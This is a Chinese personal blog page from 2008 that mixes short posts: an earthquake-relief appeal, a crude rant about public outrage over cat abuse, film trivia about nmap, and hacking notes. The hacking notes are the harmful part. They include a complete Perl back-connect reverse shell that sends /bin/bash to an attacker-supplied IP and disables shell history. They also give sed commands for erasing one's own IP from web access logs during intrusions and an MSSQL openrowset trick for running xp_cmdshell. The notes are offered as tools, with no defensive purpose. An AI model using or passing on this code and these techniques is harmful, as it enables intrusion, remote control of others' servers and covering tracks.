May 16
-
Categories
-
Blogroll
Suggest
浏览模式: 标准 | 列表
全部文章May 16
May 14
地震了,希望所有的人们平安,做自己力所能及的事情,请求大家不要散布没有经过验证的信息,不要引起恐慌。
也希望大家能够出一份绵薄之力,支援灾区的人们,他们现在需要的是食品,药物,饮用水,帐篷,衣服等,如果你有觉得款式落后或者不太喜欢的衣服,请洗干净之后送到当地的捐赠点或者红十字会;您可以号召您身边的人,为他们做点什么。
不管遭受多大的困难,我们始终是在一起的,希望您一个人的爱心,可以影响身边的人,为灾区的人们做一点力所能及的事情。
红十字会捐赠网址:
May 11
#!/usr/bin/perl
# D.O.M TEAM - 2007
# anonyph; arp; ka0x; xarnuz
# 2005 - 2007
# BackConnectShell + Rootlab t00l
# priv8!
# 3sk0rbut0@gmail.com
#
# Backconnect by data cha0s (modificada por D.O.M)
# r00t l4b by D.O.M
use IO::Socket;
use Socket;
use FileHandle;
$system = '/bin/bash';
if(!$ARGV[0])
{
print "\nBackConnect Shell - D.O.M TEAM\n\n";
print "Usage: perl $0 [IPHOST] [NCPORT]\n";
print "Example: perl $0 82.85.55.21 6850\n\n";
exit;
}
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) ||
die print "[-] Protocolo Desconocido\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) ||
die print "[-] Error Socket\n";
print "[+] BackConnect Shell\n";
print "[+] Conectando a $ARGV[0]... \n";
print "[+] Enviando Shell... \n";
print "[+] Conectado. \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "\n******* ConnectBack Shell *******\n\n";
system("unset HISTFILE;unset SAVEHIST ;cat /proc/version;whoami;id;who;pwd");
May 11
一、Linux中find常见用法示例
·find path -option [ -print ] [ -exec -ok command ] {} \;
#-print 将查找到的文件输出到标准输出
#-exec command {} \; -----将查到的文件执行command操作,{} 和 \;之间有空格
#-ok 和-exec相同,只不过在操作前要询用户
May 06
安装模块 ;
cpan > get Net::Telnet:Cisco
install Net::Telnet::Cisco
perl -e 'use Net::Telnet::Cisco' 进行测试。没有错误的话,继续啊。。。
#!/usr/bin/perl
#author: MR.weblily
#date: 2008.3.30
use Net::Telnet::Cisco;
use warnings;
my $HOST= "192.168.100.254";
my $USER= 'root';
my $PASS= 'admin';
my $session = Net::Telnet::Cisco->new(Host => $HOST);
if($session->login($USER, $PASS)){print "远程登录路由器成功!!!!\n"};
sub exect_IP{
$session->cmd('conf t');
$session->cmd('no ip route 0.0.0.0 0.0.0.0');
$session->cmd("ip route 0.0.0.0 0.0.0.0 $_[0].$_[1].$_[2].$_[3]");
$session->close;
}
# Enable mode
if ($session->enable("admin") ) {
@runarray=$session->cmd('show run');
foreach(@runarray){
if(/0.0.0.0/){
$_ =~ s/\s+//;
$it = substr($_,25);
}
}
if ($it eq '192.168.100.252') {
&exect_IP(10,0,0,1);
print "网关已经由252切换到10.0.0.1上\n"}
else {&exect_IP(192,168,100,252);
print "网关已经由10.0.0.1切换到252上\n"}
}
May 01
| LIKE 與萬用字元( % 、 _ ) | |
| 「%」是個萬用字元,它可以用來代表零或多個字元;「_」也是個萬用字元,但它只能用來代表一個字元。將它們與「LIKE」搭配使用,可以用來對字串內容進行模糊比對,這與「=」的精確比對是不同的。 | |
| 用法:SELECT realname LIKE '陳%' FROM student | |
| 說明:找出姓「陳」的所有學生 | |
| 用法:SELECT num LIKE '_568' FROM product | |
| 說明:找出編號(共 4 碼)末 3 碼為「568」的所有產品 | |
| ASCII(str) | |
| 用法:SELECT ASCII('dx') | |
| 說明:傳回 str 字串中最左邊字元的 ASCII 碼 | |
| CONCAT(s1, s2, .....) | |
| 用法:SELECT CONCAT('My', 'S', 'QL') | |
| 說明:將字串 s1, s2, ... 全部連接成一個字串 |
Apr 30
sed 在渗透的时候很有作用:具体如下
以下命令将a.txt文本中的所有的“127.0.0.1”替换为“192.168.0.8”
sed -i s/127.0.0.1/192.168.0.8/g a.txt
如果不想改动原文件a.txt,则可以用以下命令生成新文件new.txt
sed -e s/127.0.0.1/192.168.0.8/g a.txt > new.txt
比如删除web里面你ip的日志
sed -i '/192\.168\.44\.1/d' access_log 这样不用担心selinux问题
将某行注释掉
sed -i 's/Protocol 2/#Protocol 2/' /etc/ssh/sshd_config
sed -i 's/AcceptEnv/#AcceptEnv/g' /etc/ssh/sshd_config
sed -i 's/^UsePAM/#UsePAM/g' /etc/ssh/sshd_config
sed -i 's/^GSSAPI/#GSSAPI/g' /etc/ssh/sshd_config
sed -i 's/SendEnv/#SendEnv/g' /etc/ssh/ssh_config
sed -i 's/GSSAPI/#GSSAPI/g' /etc/ssh/ssh_config
sed -i 's/ForwardX11Trusted/#ForwardX11Trusted/g' /etc/ssh/ssh_config
Apr 27
Apr 20
小雨那个可怜的孩子不小心下楼梯把腿摔断了,最近一直在家呆着,看了看她给我的那个放后门的方式,实用性和通用性比较强,不存在版本限制,所以基本上2.4.x-2.6.x的版本的都可以放,找了几台机器测试了一下,基本上都成功了,但是至于为什么能root,这个暂时还没想到原因,找资料验证先……
Apr 18
Apr 10
Apr 09
最近网上又流传出来了虐猫事件,本来不想说什么的,可是看着那些虚伪的SB在那里拼命的作秀,拼命的显示自己所谓的爱心。不乏有人来这里作流泪表演,更不乏有所谓的义愤填膺的正义之士,跳出来作人肉搜索。我只想骂一句,别TMD在那里表演,显示自己所谓的爱心了。你们只是一群虚伪的SB。哗众取宠的小丑而已。
一只母猫被人缝住了生殖器,然后全民大动员,开展了所谓的爱心抢救。大妈阿姨,都一把鼻涕一把泪的在那里诅咒虐猫的人不得好死。捐钱捐物,把那只垂死的猫送到了宠物医院,给最好的食物,给最好的照顾,充分的在那里表演,显示自己是多么的有爱心。我还是之想说那几个字:虚伪,恶心,作秀……
外面那么多流浪的儿童比那只猫更需要救助,可是没见那些大妈阿姨去奉献自己所谓的爱心……为虾米?原因很简单,救助一只猫比救助一个孩子成本要低廉许多,还不用担心引来不必要的麻烦,还能充分的体现自己所谓的爱心。一石三鸟,何乐而不为呢,搞不好还能出名,让人们都知道我是一个多么有爱心的人。
那些猫大妈狗阿姨们,别忘记了,人才是这个社会的主体,你们以后需要人来给你们提供帮助和所必须的东西,而不是一只猫和一只狗,猫和狗不能给你创造食物,不能和你结婚,不能和你做爱生孩子--当然,如果你愿意和它们做爱,也可以……,请你们从你们所谓的爱心里面分出一点点,多关注那些流浪儿童和那些真正需要帮助的人,而不是那些你们的猫儿子和狗女儿……请允许我在这里再次声明一下,你们那些所谓的爱心并不会给你们带来什么回报,猫是生命力很强的物种,当你们还是单细胞动物的时候这种禽兽已经在地球上存在了几万年了,猫的生殖能力也是十分恐怖的,过量的猫只会造成其他物种的灭绝。请你们收起所谓的爱心。好好在家看电视上网,看着那些猫被处理掉。请你们施舍一点你们的所谓的爱心,给那些真正需要帮助的人,而不是那些流浪猫和流浪狗,毕竟,还有其他一种叫做“人"的动物更需要你们的帮助……
Apr 07
今天又看了一下《谍影重重3》发现里面破解那个报社记者邮箱的时候出现了一个镜头,上面的扫描器器是nmap,版本号没看清楚,里面用的浏览器是mozilla早期的那个浏览器。记得最早在影视作品里看到nmap是在之前《黑客帝国2》里面,扫描ssh然后用一个ssh溢出得到root权限的画面,然后就是大概04年的时候看一个描写凯文.米特尼克的影视作品里面的,当时用的也是nmap3.0版本的,然后就是在一个德国的黑客电影,那个电影可是说是我目前见过拍的最专业的电影了,画面反复出现了nmap的扫描,然后用vb些远程控制木马,调用API函数,后来木马被人用IDA反编译找登录密码,相比起来国内那些白痴的黑客电影,那些白痴导演真的要补习一下计算机知识了。最后是在泰国的那个电影《骇客13》里面那个MM用nmap扫描然后用radmin去连接远程服务器的那个镜头了。
纵观这些影视作品里也可以看出来nmap确实是一个重量级别的扫描器,从nmap官方站给出来的信息来看,nmap是美国国土安全局必备的安全工具之一。
。
Apr 05
1.关于openrowset和opendatasource
可能这个技巧早有人已经会了,就是利用openrowset发送本地命令。通常我们的用法是(包括MSDN的列子)如下:
select * from openrowset('sqloledb','myserver';'sa';'','select * from table')
可见(即使从字面意义上看)openrowset只是作为一个快捷的远程数据库访问,它必须跟在select后面,也就是说需要返回一个recordset 。
那么我们能不能利用它调用xp_cmdshell呢?答案是肯定的!
select * from openrowset('sqloledb','server';'sa';'','set fmtonly off exec master.dbo.xp_cmdshel l ''dir c:\''')
必须加上set fmtonly off用来屏蔽默认的只返回列信息的设置,这样xp_cmdshell返回的output集合就会提交给前面的select显示,如果采用默认设置,会返回空集合导致select出错,命令也就无法执行了